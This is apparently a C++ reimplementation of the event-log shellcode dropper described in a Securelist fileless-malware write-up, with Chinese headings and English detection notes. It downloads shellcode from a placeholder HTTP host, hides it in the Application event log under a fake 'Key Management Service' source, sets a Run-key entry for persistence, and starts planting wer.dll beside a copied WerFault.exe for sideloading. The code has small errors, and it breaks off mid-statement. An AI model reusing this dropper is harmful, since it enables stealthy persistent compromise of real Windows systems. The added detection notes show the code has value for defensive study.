原文章:
https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/
EventShellcodeDropper
核心功能:下载shellcode和wer.dll,并将shellcode写入eventlog
#include <windows.h>
#include <iostream>
#include <objbase.h>
#import "C:\\Windows\\System32\\winhttpcom.dll" no_namespace
#pragma comment(lib, "ole32.lib")
#pragma comment(lib, "oleaut32.lib")
// Interface ID of IWinHttpRequest ({06f29373-5c5a-4b54-b025-6ef1bf8abf0e}),
// handed to CoCreateInstance in DownloadFile so the WinHttpRequest COM object
// is returned as that interface. The interface type itself comes from the
// #import of winhttpcom.dll above.
const IID IID_IWinHttpRequest =
{
0x06f29373,
0x5c5a,
0x4b54,
{
0xb0, 0x25, 0x6e, 0xf1, 0xbf, 0x8a, 0xbf, 0x0e}
};
// Stores a raw byte buffer in the Windows event log as the binary data of a
// single event. This is the "event log as payload stash" step of the technique
// described in the referenced Securelist write-up.
//
// Detection notes: the event is reported under the source
// "Key Management Service" as EVENTLOG_INFORMATION_TYPE with event ID 0x4142
// and category 9999, and carries the entire buffer as opaque binary event data.
// An information event from that source whose data field is a large binary
// blob is the artifact a defender can hunt for in the Application log.
//
// pBuffer, len: the bytes to store and their length.
// Returns TRUE if ReportEventW succeeded, FALSE otherwise.
BOOL WriteEvents(PBYTE pBuffer,DWORD len) {
HANDLE hEventLog;
// The handle is used without checking for NULL.
hEventLog = RegisterEventSourceW(0,L"Key Management Service");
// No strings (0 strings, 0 SID); the payload travels only in the data field.
if (!ReportEventW(hEventLog, EVENTLOG_INFORMATION_TYPE, 0x4142, 9999, 0, 0, len, 0, (LPVOID)pBuffer)) {
CloseEventLog(hEventLog);
return FALSE;
}
CloseEventLog(hEventLog);
return TRUE;
}
// Fetches a remote payload over HTTP through the WinHttp.WinHttpRequest.5.1
// COM object and copies the response body into a caller-supplied buffer.
//
// chUrl:  URL to fetch (main passes a plain http:// address).
// dwLen:  receives the byte count, computed from the SAFEARRAY bounds of the
//         response body.
// buffer: destination for the response bytes. Its capacity is not passed in,
//         so the copy length is governed only by the size of the response.
//
// Detection notes: this is the one point where the payload crosses the wire;
// an outbound GET issued via the WinHttpRequest COM object from an otherwise
// non-networking process is the observable.
// Note: dwLen is assigned from UpperBounds/LowerBounds, which are only set on
// the success path (they are declared uninitialized below).
VOID DownloadFile(const wchar_t* chUrl,DWORD& dwLen,PBYTE buffer) {
long UpperBounds;
long LowerBounds;
unsigned char* buff;
// Variable for return value.
HRESULT hr;
// Initialize COM (the result is overwritten by the next hr assignment).
hr = CoInitialize(NULL);
IWinHttpRequest* pIWinHttpRequest = NULL;
VARIANT varFalse;
VARIANT varEmpty;
VARIANT varResponse;
VariantInit(&varResponse);
CLSID clsid;
// varFalse: the "Async" argument of Open — a synchronous request.
VariantInit(&varFalse);
V_VT(&varFalse) = VT_BOOL;
V_BOOL(&varFalse) = VARIANT_FALSE;
// varEmpty: VT_ERROR stands in for an omitted optional argument (no request body).
VariantInit(&varEmpty);
V_VT(&varEmpty) = VT_ERROR;
hr = CLSIDFromProgID(L"WinHttp.WinHttpRequest.5.1", &clsid);
if (SUCCEEDED(hr))
{
hr = CoCreateInstance(clsid, NULL,
CLSCTX_INPROC_SERVER,
IID_IWinHttpRequest,
(void**)&pIWinHttpRequest);
}
// ==== Fetch the response body into memory. (Comment inherited from the MSDN
// WinHttpRequest sample; nothing is written to disk in this function.) ====
if (SUCCEEDED(hr))
{
// Open WinHttpRequest for synchronous access.
BSTR bstrMethod = SysAllocString(L"GET");
BSTR bstrUrl = SysAllocString(url);
hr = pIWinHttpRequest->Open(bstrMethod, bstrUrl, varFalse);
SysFreeString(bstrMethod);
SysFreeString(bstrUrl);
}
if (SUCCEEDED(hr))
{
// Send Request.
hr = pIWinHttpRequest->Send(varEmpty);
}
if (SUCCEEDED(hr))
{
// Get response body (a SAFEARRAY of bytes on success).
hr = pIWinHttpRequest->get_ResponseBody(&varResponse);
}
if (SUCCEEDED(hr))
{
if (varResponse.vt == (VT_ARRAY | VT_UI1)) {
long Dims = SafeArrayGetDim(varResponse.parray);
// The array should only have 1 dimension.
if (Dims == 1) {
// Get upper and lower array bounds.
SafeArrayGetLBound(varResponse.parray, 1,
&LowerBounds);
SafeArrayGetUBound(varResponse.parray, 1,
&UpperBounds);
// Make the range half-open so UpperBounds - LowerBounds is the element count.
UpperBounds++;
// Lock SAFEARRAY for access (return value not checked).
SafeArrayAccessData(varResponse.parray,
(void**)&buff);
// Copy the downloaded bytes into the caller's buffer.
memcpy(buffer, buff, (UpperBounds - LowerBounds));
SafeArrayUnaccessData(varResponse.parray);
}
}
}
// Report the length of the downloaded payload.
dwLen = UpperBounds - LowerBounds;
// Release memory (varResponse itself is not VariantClear'd).
if (pIWinHttpRequest)
pIWinHttpRequest->Release();
CoUninitialize();
}
int main() {
//拷贝文件
CopyFileW(L"C:\\Windows\\system32\\WerFault.exe", L"C:\\Windows\\Tasks\\WerFault.exe", 0);
//权限维持
HKEY hResult;
RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &result);
RegSetValueExW(hResult, L"Windows Problem Reporting", 0, 1, (const BYTE*)L"C:\\Windows\\Tasks\\WerFault.exe", 0x3c);
RegCloseKey(hResult);
//写shellcode到事件
DWORD dwCodeSize;
PBYTE pShellcodeBytes = (PBYTE)malloc(0x10000);
DownloadFile(L"http://x.x.x.x/test.bin", dwCodeSize, pShellcodeBytes);
if(!WriteEvents(pShellcodeBytes, dwCodeSize)) {
return -1;
}
// Create file.
HANDLE hFile;
DWORD dwBytesWritten;
hFile = CreateFile(TEXT("C:\\Windows\\Tasks\\wer.dll"),
GENERIC_WRITE, // Open for writing.
0, // Do not share.
NULL, // No security.
CREATE_ALWAYS, // Overwrite existing.
FILE_ATTRIBUTE_NORMAL, // Normal file.
NULL); // No attribute template.
if (hFile == INVALID_HANDLE_VALUE)
{
return -1;
}
else
{
DWORD dwFileSize;
PBYTE pFileBytes =